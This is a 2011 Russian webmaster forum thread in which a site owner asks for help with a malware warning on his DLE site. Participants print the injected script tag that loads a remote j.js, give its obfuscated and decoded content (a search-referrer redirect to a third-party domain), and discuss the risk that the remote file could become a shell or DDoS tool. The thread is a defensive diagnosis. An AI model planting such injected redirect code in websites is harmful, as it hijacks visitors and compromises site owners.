Проблема
Страницы: 1
Проблема
Тут такая проблема появилась мой сайт в "ОПЕРЕ" пишет "Предупреждение о вредоносном ПО", я сначало не понял почему пока не порылся в "Исходном коде страницы"
там есть такие скрипты:
Для Dle есть такой модуль "Переходы" и там есть такие переходы "kinoz <sc ript src=http://quzone.ru/j.js></script>(скрипта нет тока в "Исходном коде страницы") " , а этот скрипт активируется
Код
<sc ript src=http://quzone.ru/j.js></script>

Рисунок


Кто подскажет что это за скрипт и что он делает
Изменено: killer1000 - 15 Июня 2011 19:56
по этому адресу вот чё лежит:
function l(h) {return parseInt(h,16);}var r=document.referrer;if (r.indexOf('google.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('yandex.') > -1 || r.indexOf('bing.com.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('rambler.') > -1 || r.indexOf('go.mail.') > -1){document.write(une scape("%3Cscript%20type%3D%22text/javascript%22%3Esp_redirect%20%3D%20%7B%7D%3Bsp_redirect.searchers%20%3D%20%5B%20%5B/google%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.yahoo%5C./i%2C%20/%28%5C%3F%7C%26%29p%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/bing%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.aol%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/ask%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/altavista%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.lycos%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/alltheweb%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/yandex%5C./i%2C%20/%28%5C%3F%7C%26%29text%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/%28nova%5C.%7Csearch%5C.%29%3Frambler%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/gogo%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/go%5C.mail%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/nigma%5C./i%2C%20/%28%5C%3F%7C%26%29s%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%5D%3Bsp_redirect.sp_redirect%20%3D%20function%28referer%29%20%7B%20var%20query%3Dnull%3B%20for%28var%20i%3D0%3B%20i%3Csp_redirect.searchers.length%3B%20i++%29%20%7B%20%20var%20se%20%3D%20sp_redirect.searchers%5Bi%5D%3B%20%20if%20%28referer.match%28se%5B0%5D%29%29%20%7B%20%20%20query%20%3D%20referer.match%28se%5B1%5D%29%5Bse%5B2%5D%5D%3B%20%20%20break%3B%20%20%7D%20%7D%20document.location.href%3D%27http%3A//shara.lots-moment-archiv.ru/%27+%27%3Fwkey%3D"+l('825c8')+"%27+%27%27+%28query%3F%20%27%26query%3D%27+query%20%3A%20%27%27%29%3B%7D%3Bsp_redirect.sp_redirect%28document.referrer%29%3B%3C/script%3E"));
}
если есть кодеры, подскажите, что это?
раскодировал теперь помогите разобраться

Код
function l(h) {return parseInt(h,16);}var r=document.referrer;if (r.indexOf(\'google.\') > -1 || r.indexOf(\'yahoo.\') > -1 || r.indexOf(\'yandex.\') > -1 || r.indexOf(\'bing.com.\') > -1 || r.indexOf(\'yahoo.\') > -1 || r.indexOf(\'rambler.\') > -1 || r.indexOf(\'go.mail.\') > -1){document.write(une scape(\"<sc ript type="text/javascript">sp_redirect = {};sp_redirect.searchers = [ [/google\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.yahoo\./i, /(\?|&)p=(.*?)(&|$)/i, 2], [/bing\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.aol\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/ask\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2], [/altavista\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.lycos\./i, /(\?|&)query=(.*?)(&|$)/i, 2], [/alltheweb\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/yandex\./i, /(\?|&)text=(.*?)(&|$)/i, 2], [/(nova\.|search\.)?rambler\./i, /(\?|&)query=(.*?)(&|$)/i, 2], [/gogo\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/go\.mail\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/nigma\./i, /(\?|&)s=(.*?)(&|$)/i, 2]];sp_redirect.sp_redirect = function(referer) { var query=null; for(var i=0; i<sp_redirect.searchers.length; i  ) {  var se = sp_redirect.searchers[i];  if (referer.match(se[0])) {   query = referer.match(se[1])[se[2]];   break;  } } document.location.href='http://shara.lots-moment-archiv.ru/' '?wkey=\" l(\'825c8\') \"' '' (query? '&query=' query : '');};sp_redirect.sp_redirect(document.referrer);</script>\")); 
}
Ну по любому этот левый код подтягиваемый с чужого сайта настораживает. Допустим на данный момент он выполняет часть функционала модуля переходов, всё вроде ок. Далее, допустим эту версию переходов со временем скачают и поставит у себя 1000 человек на своих 1000 сайтах. И вот однажды, владелец этого _http://quzone.ru возьмёт и поменяет код в файле j.js на шелл или проксик какой ни-ть, и либо начнёт кого нибудь ddos-ить или просто на любом из сайтов покопается. А потом вернёт всё обратно, и вы даже знать не будете, что ваш сайт участвовал в атаке. Не знаю, мне кажется если на жертву единовременно будет 1000 переходов с других сайтов, сайт ляжет.
Изменено: daden11 - 15 Июня 2011 21:01
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
14:32 Партнерская программа OWNR WALLET 
14:18 Стоит ли добавлять сайт в Rambler топ 100? 
18:09 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
15:06 Влияние ссылок буржнете 
10:53 SharkBoss - партнёрская программа для монетизации ЛЮБЫХ видов трафика (включая спам). 
08:36 Обновления интерфейса яндекс метрики 
15:13 Рапида умерла. Куда выводить с AdSense? 
11:54 Transit-Bit.com - Обмен USDT на IDR, THB, RUB и наличные 
10:21 [eBucks] Автоматический обмен криптовалют. BTC и любые альткоины. Киви, Банковские карты и др. электронные системы. 
22:15 Криптовалютный обменник Xgram.io - новое воплощение качества 
15:49 Проверка на индекс в Telegram боте @SpeedyIndexbot 
13:47 HidMark.com - естественные ссылки от 1.5$ Естественные ссылки. Крауд-маркетинг. 
12:05 USMobileSMSBot - 
11:16 4G/LTE Mobile Proxy 30+ geo  
12:30 В России снизили беспошлинный порог для онлайн-покупок 
12:25 Binance будет передавать данные о транзакциях свыше $1 тыс. 
22:48 150+ хакерских поисковых систем и инструментов 
22:43 Точные прогнозы на футбол 
19:49 Текст.ру преподнёс "подарок" 
18:12 Подтягиваем физкультурку 
13:30 Тренды заработка 2024-2025